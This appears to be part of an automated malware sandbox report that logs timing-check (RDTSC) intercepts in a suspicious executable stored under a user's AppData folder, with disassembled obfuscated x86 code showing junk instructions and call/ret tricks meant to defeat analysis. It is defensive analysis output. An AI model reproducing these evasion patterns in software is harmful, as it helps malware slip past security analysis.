Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 963855 second address: 96388B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5828704A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F5828704A77h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828704A6Ah 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96388B second address: 9638AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828CEC312h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9638AA second address: 9638B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9638B1 second address: 963904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F5828CEC308h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 add dword ptr [ebp+122D1F2Ch], ecx 0x00000028 sub si, F48Bh 0x0000002d call 00007F5828CEC309h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F5828CEC311h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 963A48 second address: 963A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 963EA4 second address: 963EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96436E second address: 964372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964372 second address: 964376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9643F7 second address: 96440E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5828704A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F5828704A66h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96440E second address: 964425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC313h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964506 second address: 96451B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828704A70h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96467D second address: 964687 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964687 second address: 9646A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A75h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964981 second address: 964987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964987 second address: 96498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96498B second address: 96499D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F5828CEC310h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96499D second address: 9649CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5828704A68h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2B70h] 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9649CD second address: 9649DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964EB6 second address: 964EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964EBA second address: 964EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964EC6 second address: 964F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F5828704A78h 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e movzx esi, si 0x00000011 or eax, dword ptr [ebp+122D561Fh] 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c sbb esi, 08A5F7D0h 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 push esi 0x00000026 pop esi 0x00000027 pop edi 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 966938 second address: 966957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9660C6 second address: 9660CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9660CC second address: 9660D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9660D1 second address: 9660F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9673C1 second address: 9673CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96944F second address: 969455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 969455 second address: 9694BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movsx esi, ax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5828CEC308h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F5828CEC308h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov si, di 0x0000004b ja 00007F5828CEC306h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9694BA second address: 9694C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96914B second address: 96914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 969DF5 second address: 969DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96914F second address: 96915E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96A041 second address: 96A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 969DF9 second address: 969E07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 969E07 second address: 969E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E710 second address: 96E722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnp 00007F5828CEC306h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E90F second address: 96E934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5828704A71h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E934 second address: 96E93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E93B second address: 96E9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 3ACC8044h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F5828704A68h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D3785h], eax 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b pushad 0x0000003c mov esi, dword ptr [ebp+122D1E23h] 0x00000042 cmc 0x00000043 popad 0x00000044 mov eax, dword ptr [ebp+122D0FD9h] 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F5828704A68h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 jnl 00007F5828704A6Eh 0x0000006a push FFFFFFFFh 0x0000006c mov edi, dword ptr [ebp+1246E7C2h] 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F5828704A6Fh 0x0000007a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E9D0 second address: 96E9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97180A second address: 97180F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 970988 second address: 970992 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5828CEC30Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 970992 second address: 970A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e je 00007F5828704A6Ch 0x00000014 jnl 00007F5828704A66h 0x0000001a sbb ebx, 1B4BFD3Ah 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F5828704A68h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0421h] 0x00000047 jne 00007F5828704A6Ch 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F5828704A68h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 xor ebx, 3F829395h 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F5828704A6Fh 0x00000077 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9727E0 second address: 9727F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC314h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9727F8 second address: 972828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2388h], edi 0x00000011 push 00000000h 0x00000013 add bx, 57CBh 0x00000018 xor ebx, dword ptr [ebp+122D2964h] 0x0000001e push 00000000h 0x00000020 jnp 00007F5828704A69h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972828 second address: 97282C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97282C second address: 972830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9718FB second address: 971902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972830 second address: 972836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972836 second address: 972845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC30Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972845 second address: 972853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972853 second address: 972857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 972857 second address: 972861 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9739EB second address: 9739F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9739F1 second address: 973A21 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828704A75h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828704A74h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 973A21 second address: 973A26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976DB0 second address: 976DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A75h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976DC9 second address: 976DDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976DDB second address: 976DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976DE2 second address: 976E5D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828CEC308h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+12449762h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F5828CEC308h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push edx 0x00000030 or edi, 25FA20FFh 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 jmp 00007F5828CEC30Ch 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F5828CEC311h 0x00000047 jmp 00007F5828CEC317h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976E5D second address: 976E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976E64 second address: 976E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976E71 second address: 976E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 976E76 second address: 976E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 977E32 second address: 977E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5828704A6Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97E5CF second address: 97E5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97A77C second address: 97A79B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828704A6Ch 0x00000008 jc 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F5828704A6Ch 0x00000019 jnc 00007F5828704A66h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9805FA second address: 9805FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97B744 second address: 97B74A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98822D second address: 988254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC316h 0x00000009 jmp 00007F5828CEC30Dh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 987DAF second address: 987DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D700 second address: 98D704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D704 second address: 98D747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5828704A74h 0x0000000d push ebx 0x0000000e jnp 00007F5828704A66h 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F5828704A72h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D860 second address: 98D865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D865 second address: 98D8AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828704A73h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F5828704A70h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5828704A77h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98D8AF second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828CEC308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e add cx, A55Fh 0x00000013 popad 0x00000014 push dword ptr [ebp+122D1685h] 0x0000001a jns 00007F5828CEC309h 0x00000020 pushad 0x00000021 cld 0x00000022 popad 0x00000023 call dword ptr [ebp+122D389Ah] 0x00000029 pushad 0x0000002a jns 00007F5828CEC31Dh 0x00000030 pushad 0x00000031 jmp 00007F5828CEC315h 0x00000036 popad 0x00000037 xor eax, eax 0x00000039 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 pushad 0x00000044 mov dword ptr [ebp+122D1EFAh], edi 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D29CCh], eax 0x00000051 js 00007F5828CEC312h 0x00000057 sub dword ptr [ebp+122D1F2Ch], ecx 0x0000005d mov esi, 0000003Ch 0x00000062 cld 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D1A4Ch], esi 0x0000006d lodsw 0x0000006f jmp 00007F5828CEC318h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 clc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e push eax 